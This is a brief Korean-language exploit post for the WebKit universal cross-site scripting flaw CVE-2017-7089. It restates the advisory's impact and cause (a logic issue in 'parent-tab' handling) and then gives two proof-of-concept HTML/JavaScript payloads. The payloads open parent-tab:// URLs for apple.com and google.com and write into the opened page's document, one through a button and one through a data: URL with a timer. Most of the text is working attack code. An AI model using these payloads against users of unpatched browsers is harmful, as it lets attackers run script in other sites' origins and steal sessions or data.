
Webkit uxss 익스플로잇 (CVE-2017-7089)
영향: 악의적으로 조작된 웹 콘텐츠를 처리할 경우 범용 크로스 사이트 스크립팅이 발생할 수 있습니다.
설명: parent-tab 처리에 논리적 문제가 있었습니다. 이 문제는 개선된 상태 관리로 해결되었습니다.
<script> function Pew(){var doc=open('parent-tab://apple.com');doc.document.body.innerHTML='';}</script><button onclick=Pew();>Click me!</button>
data:text/html,<script>function y(){x=open('parent-tab://google.com','_top'),x.document.body.innerHTML=''};setTimeout(y,100)</script>